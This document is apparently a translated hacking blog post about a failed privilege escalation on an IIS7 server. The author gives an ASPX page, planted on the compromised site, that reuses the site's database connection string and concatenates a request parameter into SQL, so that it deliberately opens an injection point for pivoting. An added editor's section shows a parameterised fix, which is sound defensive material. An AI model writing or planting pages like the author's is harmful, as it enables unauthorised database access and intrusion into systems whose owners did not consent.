Yesterday 4z1 and I were looking at a site. Privilege escalation was really hard; we stared at it for a full 5 hours with nothing to show. 2008 + IIS7, no sa, no root, none of the usual services...
In the middle of it I used ASPX constructed injection to go cross-site; I found a pile of code online and not one of them worked.
It isn't much code, so I just wrote one myself and was done with it. So annoying.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影 ASPX constructed-injection page</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="C#" runat="server">
void Page_Init(object sender, EventArgs e)
{
    // Reuse the target site's own connection string from its web.config;
    // "<connection name>" is the name of the connectionStrings entry there.
    System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
    conn.ConnectionString = ConfigurationManager.ConnectionStrings["<connection name>"].ConnectionString;
    conn.Open();

    // The injection point: the value comes straight from ?xxser=1 ...
    string i = this.Page.Request.Params["xxser"];
    // ... and is concatenated into the statement unquoted, so whatever follows the
    // number is executed as SQL (deliberately vulnerable; that is the purpose of the page).
    System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [<table>] where <column> = " + i, conn);
    // ExecuteNonQuery returns -1 for a SELECT, so x carries no row data: the useful
    // feedback is the SQL Server error text ASP.NET renders when the statement throws.
    int x = command.ExecuteNonQuery();
    Response.Write(i + "\n");
    Response.Write(x);
    conn.Close();
}
</script>
</div>
</form>
</body>
</html>
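For contrast, here is the same lookup written the way the target site should have written it. This is an editor's added example, not code from the post or its author; the connection-string name "SiteDb", the table [Orders] and the column [Id] are hypothetical placeholders. It shows exactly what the concatenation above is missing, and why the page only becomes an injection point once you can drop your own .aspx onto the server.

```csharp
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>Parameterised lookup (editor's example)</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="C#" runat="server">
void Page_Init(object sender, EventArgs e)
{
    // Hypothetical names: replace with the real connection-string entry, table and column.
    string connName = "SiteDb";
    string raw = Request.Params["xxser"];

    // 1. Validate the type first. The vulnerable page concatenates whatever arrives;
    //    here anything that is not an integer never reaches SQL Server at all.
    int id;
    if (string.IsNullOrEmpty(raw) || !int.TryParse(raw, out id))
    {
        Response.StatusCode = 400;
        Response.Write("bad id");
        return;
    }

    // 2. Bind the value as a typed parameter. The statement text is fixed at compile
    //    time, so "1 or 1=1", stacked queries and comment sequences fail the parse
    //    above instead of becoming part of the query.
    const string sql = "select top 1 * from [Orders] where [Id] = @id";
    using (SqlConnection conn = new SqlConnection(
               ConfigurationManager.ConnectionStrings[connName].ConnectionString))
    using (SqlCommand command = new SqlCommand(sql, conn))
    {
        command.Parameters.Add("@id", SqlDbType.Int).Value = id;
        conn.Open();
        using (SqlDataReader reader = command.ExecuteReader())
        {
            Response.Write(reader.HasRows ? "found" : "not found");
        }
    }
    // 3. Do not echo exception text to the client: keep customErrors On or RemoteOnly
    //    in web.config so a failing statement does not hand back the error-based channel
    //    that the page above relies on.
}
</script>
</div>
</form>
</body>
</html>
```

The `using` blocks also close the connection on the exception path, which the original page does not do; with concatenated input that leak is the least of its problems, but once the query is parameterised it is the remaining difference between the two pages.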